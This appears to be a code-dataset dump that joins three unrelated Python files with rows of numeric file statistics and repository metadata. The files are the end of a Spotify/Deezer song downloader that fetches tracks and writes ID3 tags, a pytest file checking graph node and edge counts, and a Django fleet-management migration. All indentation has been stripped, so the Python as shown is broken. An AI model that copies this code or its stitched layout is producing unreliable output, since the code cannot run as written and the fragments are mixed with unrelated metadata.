if check == False:
continue
print(dir + name)
ans = input("Song already exist do you want to redownload it?(y or n):")
if not ans == "y":
return
try:
self.download(urls[a], dir)
except TrackNotFound:
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "") + " + " + artist[a].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "") + " + " + artist[a].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
try:
for b in range(url['total'] + 1):
if url['data'][b]['title'] == music[a] or url['data'][b]['title_short'] in music[a]:
URL = url['data'][b]['link']
break
except IndexError:
try:
try:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "").split(" ")[0] + " + " + artist[a].replace("#", "")).text)
except:
url = json.loads(requests.get("https://api.deezer.com/search/track/?q=" + music[a].replace("#", "").split(" ")[0] + " + " + artist[a].replace("#", "")).text)
try:
if url['error']['message'] == "Quota limit exceeded":
raise QuotaExceeded("Too much requests limit yourself")
except KeyError:
None
for b in range(url['total'] + 1):
if music[a].split(" ")[0] in url['data'][b]['title']:
URL = url['data'][b]['link']
break
except IndexError:
print("\nTrack not found: " + music[a] + " - " + artist[a])
continue
self.download(URL, dir)
urls[a] = URL
try:
os.rename(dir + urls[a].split("/")[-1] + ".mp3", dir + name)
except FileNotFoundError:
None
try:
tag = EasyID3(dir + name)
tag.delete()
except mutagen.id3.ID3NoHeaderError:
tag = mutagen.File(dir + name, easy=True)
tag.add_tags()
except:
continue
tag['artist'] = artist[a]
tag['title'] = music[a]
tag['date'] = year[0]
tag['album'] = album[0]
tag['tracknumber'] = str(tracknum[a])
tag['discnumber'] = str(discnum[a])
tag['genre'] = " & ".join(genre)
tag['albumartist'] = ", ".join(ar_album)
tag.save(v2_version=3)
audio = ID3(dir + name)
audio['APIC'] = APIC(encoding=3, mime='image/jpeg', type=3, desc=u'Cover', data=image)
audio.save()
return names
def download_playlistspo(self, URL, output=localdir + "/Songs/", check=True):
global spo
array = []
if not len(URL) == 87 and not len(URL) == 69:
URL,a = URL.split("?")
if len(URL) != 87 and len(URL) != 69:
raise InvalidLink("Invalid link ;)")
URL = URL.split("/")
try:
tracks = spo.user_playlist_tracks(URL[-3], playlist_id=URL[-1])
except:
token = generate_token()
spo = spotipy.Spotify(auth=token)
tracks = spo.user_playlist_tracks(URL[-3], playlist_id=URL[-1])
for a in tracks['items']:
try:
array.append(self.download_trackspo(a['track']['external_urls']['spotify'], output, check, True))
except IndexError:
print("\nTrack not found " + a['track']['name'])
array.append(localdir + "/Songs/" + a['track']['name'])
for a in range(tracks['total'] // 100):
try:
tracks = spo.next(tracks)
except:
token = generate_token()
spo = spotipy.Spotify(auth=token)
tracks = spo.next(tracks)
for a in tracks['items']:
try:
array.append(self.download_trackspo(a['track']['external_urls']['spotify'], output, check, True))
except IndexError:
print("\nTrack not found " + a['track']['name'])
array.append(localdir + "/Songs/" + a['track']['name'])
return array
def download_name(self, artist, song, output=localdir + "/Songs/", check=True):
global spo
try:
search = spo.search(q="track:" + song + " artist:" + artist)
except:
token = generate_token()
spo = spotipy.Spotify(auth=token)
search = spo.search(q="track:" + song + " artist:" + artist)
try:
return self.download_trackspo(search['tracks']['items'][0]['external_urls']['spotify'], output, check)
except IndexError:
raise TrackNotFound("Track not found: " + artist + " - " + song)
| 43.958531
| 183
| 0.46147
| 3,818
| 37,101
| 4.447355
| 0.079885
| 0.032391
| 0.036042
| 0.042403
| 0.825383
| 0.816784
| 0.800236
| 0.783746
| 0.774087
| 0.752356
| 0
| 0.015451
| 0.380718
| 37,101
| 844
| 184
| 43.958531
| 0.723581
| 0.000458
| 0
| 0.818505
| 0
| 0
| 0.155943
| 0.001726
| 0.021352
| 0
| 0
| 0
| 0
| 1
| 0.024911
| false
| 0.003559
| 0.015421
| 0
| 0.073547
| 0.010676
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1639c7c4c9d044b4d0dc72e56e536517f9485bd
| 4,080
|
py
|
Python
|
metagraph-plugin/tests/test_types.py
|
rob-isaac/katana
|
0d2943509e96a41babe67d960521dd2883698f25
|
[
"BSD-3-Clause"
] | 1
|
2021-07-06T15:51:14.000Z
|
2021-07-06T15:51:14.000Z
|
metagraph-plugin/tests/test_types.py
|
rob-isaac/katana
|
0d2943509e96a41babe67d960521dd2883698f25
|
[
"BSD-3-Clause"
] | 2
|
2020-08-15T23:41:58.000Z
|
2020-08-29T04:46:35.000Z
|
metagraph-plugin/tests/test_types.py
|
rob-isaac/katana
|
0d2943509e96a41babe67d960521dd2883698f25
|
[
"BSD-3-Clause"
] | 1
|
2021-08-18T08:46:05.000Z
|
2021-08-18T08:46:05.000Z
|
import metagraph as mg
import pytest
def test_num_nodes(katanagraph_rmat15_cleaned_di):
cnt = 0
for nid in katanagraph_rmat15_cleaned_di.value:
cnt += 1
assert katanagraph_rmat15_cleaned_di.value.num_nodes() == 32768
assert katanagraph_rmat15_cleaned_di.value.num_nodes() == cnt
def test_num_edges(katanagraph_rmat15_cleaned_di):
cnt = 0
for nid in katanagraph_rmat15_cleaned_di.value:
cnt += len(katanagraph_rmat15_cleaned_di.value.edge_ids(nid))
assert katanagraph_rmat15_cleaned_di.value.num_edges() == 363194
assert katanagraph_rmat15_cleaned_di.value.num_edges() == cnt
def test_node_schema(katanagraph_rmat15_cleaned_di):
assert "names" in dir(katanagraph_rmat15_cleaned_di.value.loaded_node_schema())
assert "types" in dir(katanagraph_rmat15_cleaned_di.value.loaded_node_schema())
assert len(katanagraph_rmat15_cleaned_di.value.loaded_node_schema()) == 0
def test_edge_schema(katanagraph_rmat15_cleaned_di):
assert "names" in dir(katanagraph_rmat15_cleaned_di.value.loaded_edge_schema())
assert "types" in dir(katanagraph_rmat15_cleaned_di.value.loaded_edge_schema())
assert len(katanagraph_rmat15_cleaned_di.value.loaded_edge_schema()) == 1
def test_edge_property(katanagraph_rmat15_cleaned_di):
assert katanagraph_rmat15_cleaned_di.value.loaded_edge_schema()[0].name == "value"
assert katanagraph_rmat15_cleaned_di.value.get_edge_property(
0
) == katanagraph_rmat15_cleaned_di.value.get_edge_property("value")
assert katanagraph_rmat15_cleaned_di.value.get_edge_property("value").to_pandas()[0] == 339302416426
def test_topology(katanagraph_rmat15_cleaned_di):
assert katanagraph_rmat15_cleaned_di.value.edge_ids(0) == range(0, 20767)
assert [
katanagraph_rmat15_cleaned_di.value.get_edge_dest(i) for i in katanagraph_rmat15_cleaned_di.value.edge_ids(0)
][0:5] == [1, 2, 3, 4, 5,]
assert katanagraph_rmat15_cleaned_di.value.edge_ids(8) == range(36475, 41133)
assert [
katanagraph_rmat15_cleaned_di.value.get_edge_dest(i) for i in katanagraph_rmat15_cleaned_di.value.edge_ids(8)
][0:5] == [0, 9, 10, 11, 12,]
def test_num_nodes_networkx(networkx_weighted_undirected_8_12, networkx_weighted_directed_8_12):
assert len(list(networkx_weighted_undirected_8_12.value.nodes(data=True))) == 8
assert len(list(networkx_weighted_directed_8_12.value.nodes(data=True))) == 8
def test_num_edges_networkx(networkx_weighted_undirected_8_12, networkx_weighted_directed_8_12):
assert len(list(networkx_weighted_undirected_8_12.value.edges(data=True))) == 12
assert len(list(networkx_weighted_directed_8_12.value.edges(data=True))) == 12
def test_topology_networkx(networkx_weighted_undirected_8_12, networkx_weighted_directed_8_12):
assert list(networkx_weighted_undirected_8_12.value.nodes(data=True)) == list(
networkx_weighted_directed_8_12.value.nodes(data=True)
)
assert list(networkx_weighted_undirected_8_12.value.nodes(data=True)) == [
(0, {}),
(1, {}),
(3, {}),
(4, {}),
(2, {}),
(5, {}),
(6, {}),
(7, {}),
]
assert list(networkx_weighted_undirected_8_12.value.edges(data=True)) == [
(0, 1, {"weight": 4}),
(0, 3, {"weight": 2}),
(0, 4, {"weight": 7}),
(1, 3, {"weight": 3}),
(1, 4, {"weight": 5}),
(3, 4, {"weight": 1}),
(4, 2, {"weight": 5}),
(4, 7, {"weight": 4}),
(2, 5, {"weight": 2}),
(2, 6, {"weight": 8}),
(5, 6, {"weight": 4}),
(5, 7, {"weight": 6}),
]
assert list(networkx_weighted_directed_8_12.value.edges(data=True)) == [
(0, 1, {"weight": 4}),
(0, 3, {"weight": 2}),
(0, 4, {"weight": 7}),
(1, 3, {"weight": 3}),
(1, 4, {"weight": 5}),
(3, 4, {"weight": 1}),
(4, 7, {"weight": 4}),
(2, 4, {"weight": 5}),
(2, 5, {"weight": 2}),
(2, 6, {"weight": 8}),
(5, 6, {"weight": 4}),
(5, 7, {"weight": 6}),
]
| 39.230769
| 117
| 0.668873
| 570
| 4,080
| 4.436842
| 0.114035
| 0.194939
| 0.275208
| 0.298142
| 0.887307
| 0.88019
| 0.879004
| 0.861605
| 0.752076
| 0.693159
| 0
| 0.07727
| 0.184804
| 4,080
| 103
| 118
| 39.61165
| 0.683103
| 0
| 0
| 0.329412
| 0
| 0
| 0.043873
| 0
| 0
| 0
| 0
| 0
| 0.294118
| 1
| 0.105882
| false
| 0
| 0.023529
| 0
| 0.129412
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e1a4bc6b9ecde53df63ca4c7ccc0e5cec70d840e
| 25,550
|
py
|
Python
|
operations/fleet_management/migrations/0002_auto_20171206_1331.py
|
kaizer88/emps
|
2669b32c46befcf1a19390fb25013817e6b00980
|
[
"MIT"
] | null | null | null |
operations/fleet_management/migrations/0002_auto_20171206_1331.py
|
kaizer88/emps
|
2669b32c46befcf1a19390fb25013817e6b00980
|
[
"MIT"
] | null | null | null |
operations/fleet_management/migrations/0002_auto_20171206_1331.py
|
kaizer88/emps
|
2669b32c46befcf1a19390fb25013817e6b00980
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-06 11:31
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import lib.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('fleet_management', '0001_initial'),
('employees', '0002_auto_20171206_1331'),
('operations', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='vehicletyre',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_tyres', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='vehicletyre',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_tyres', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='vehicletyre',
name='vehicle',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='tyres', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='vehiclemaintenance',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_vehicle_maintenance', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='vehiclemaintenance',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_vehicle_maintenance', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='vehiclemaintenance',
name='vehicle',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='maintenance_plan', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='vehicledriver',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_vehicle_drivers', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='vehicledriver',
name='driver',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='driver_vehicle', to='employees.Employee'),
),
migrations.AddField(
model_name='vehicledriver',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_vehicle_drivers', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='vehicledriver',
name='vehicle',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='vehicle_driver', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='vehicledocument',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_documents', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='vehicledocument',
name='document',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, to='operations.Document'),
),
migrations.AddField(
model_name='vehicledocument',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_documents', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='vehicledocument',
name='vehicle',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='documents', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='vehicle',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_vehicles', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='vehicle',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_vehicles', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='tracker',
name='address',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='tracker_address', to='operations.Address'),
),
migrations.AddField(
model_name='tracker',
name='contact_person',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='tracker_contact', to='operations.Contact'),
),
migrations.AddField(
model_name='tracker',
name='vehicle',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='tracker', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='purchasedetail',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_purchase_detail', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='purchasedetail',
name='dealership_address',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='dealership_address', to='operations.Address'),
),
migrations.AddField(
model_name='purchasedetail',
name='dealership_contact_person',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='dealership_contact', to='operations.Contact'),
),
migrations.AddField(
model_name='purchasedetail',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_purchase_detail', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='purchasedetail',
name='vehicle',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='purchase_detail', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='insurance',
name='broker_address',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='insurance_broker_address', to='operations.Address'),
),
migrations.AddField(
model_name='insurance',
name='broker_contact_person',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='insurance_broker_contact', to='operations.Contact'),
),
migrations.AddField(
model_name='insurance',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_insurance', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='insurance',
name='insurer',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='insurance_insurer', to='operations.Insurer'),
),
migrations.AddField(
model_name='insurance',
name='modified_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='modified_insurance', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='insurance',
name='vehicle',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='insurance', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='incident',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_incidents', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='incident',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_incidents', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='incident',
name='vehicle_driver',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='incident', to='fleet_management.VehicleDriver'),
),
migrations.AddField(
model_name='historicalvehicletyre',
name='created_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalvehicletyre',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalvehicletyre',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalvehicletyre',
name='vehicle',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='historicalvehiclemaintenance',
name='created_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalvehiclemaintenance',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalvehiclemaintenance',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalvehiclemaintenance',
name='vehicle',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='historicalvehicle',
name='created_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalvehicle',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalvehicle',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalpurchasedetail',
name='created_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalpurchasedetail',
name='dealership_address',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Address'),
),
migrations.AddField(
model_name='historicalpurchasedetail',
name='dealership_contact_person',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Contact'),
),
migrations.AddField(
model_name='historicalpurchasedetail',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalpurchasedetail',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalpurchasedetail',
name='vehicle',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='historicalinsurance',
name='broker_address',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Address'),
),
migrations.AddField(
model_name='historicalinsurance',
name='broker_contact_person',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Contact'),
),
migrations.AddField(
model_name='historicalinsurance',
name='created_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalinsurance',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalinsurance',
name='insurer',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Insurer'),
),
migrations.AddField(
model_name='historicalinsurance',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalinsurance',
name='vehicle',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='historicalfuelcard',
name='created_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalfuelcard',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalfuelcard',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalfuelcard',
name='vehicle',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='historicalfinancedetail',
name='created_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalfinancedetail',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalfinancedetail',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalfinancedetail',
name='purchase_detail',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.PurchaseDetail'),
),
migrations.AddField(
model_name='historicalbranding',
name='created_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalbranding',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalbranding',
name='installer_address',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Address'),
),
migrations.AddField(
model_name='historicalbranding',
name='installer_contact_person',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Contact'),
),
migrations.AddField(
model_name='historicalbranding',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalbranding',
name='supplier_address',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Address'),
),
migrations.AddField(
model_name='historicalbranding',
name='supplier_contact_person',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='operations.Contact'),
),
migrations.AddField(
model_name='historicalbranding',
name='vehicle',
field=lib.fields.ProtectedForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='fuelcardusage',
name='fuel_card',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='fuel_card_usage', to='fleet_management.FuelCard'),
),
migrations.AddField(
model_name='fuelcard',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_fuel_cards', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='fuelcard',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_fuel_cards', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='fuelcard',
name='vehicle',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='fuel_card', to='fleet_management.Vehicle'),
),
migrations.AddField(
model_name='financedetail',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_finance_detail', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='financedetail',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_finance_detail', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='financedetail',
name='purchase_detail',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='finance_detail', to='fleet_management.PurchaseDetail'),
),
migrations.AddField(
model_name='branding',
name='created_by',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='created_trackers', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='branding',
name='installer_address',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='branding_installer_address', to='operations.Address'),
),
migrations.AddField(
model_name='branding',
name='installer_contact_person',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='branding_installer_contact', to='operations.Contact'),
),
migrations.AddField(
model_name='branding',
name='modified_by',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='modified_trackers', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='branding',
name='supplier_address',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='branding_supplier_address', to='operations.Address'),
),
migrations.AddField(
model_name='branding',
name='supplier_contact_person',
field=lib.fields.ProtectedForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='branding_supplier_contact', to='operations.Contact'),
),
migrations.AddField(
model_name='branding',
name='vehicle',
field=lib.fields.ProtectedForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='branding', to='fleet_management.Vehicle'),
),
]
| 55.664488
| 194
| 0.66865
| 2,682
| 25,550
| 6.162192
| 0.041014
| 0.043081
| 0.074545
| 0.117142
| 0.961699
| 0.961699
| 0.929449
| 0.9165
| 0.865311
| 0.860834
| 0
| 0.002034
| 0.210881
| 25,550
| 458
| 195
| 55.786026
| 0.817677
| 0.002661
| 0
| 0.842222
| 1
| 0
| 0.163468
| 0.057381
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011111
| 0
| 0.02
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
befc70c964a89a238d0a12a520e07d654b020747
| 71,097
|
py
|
Python
|
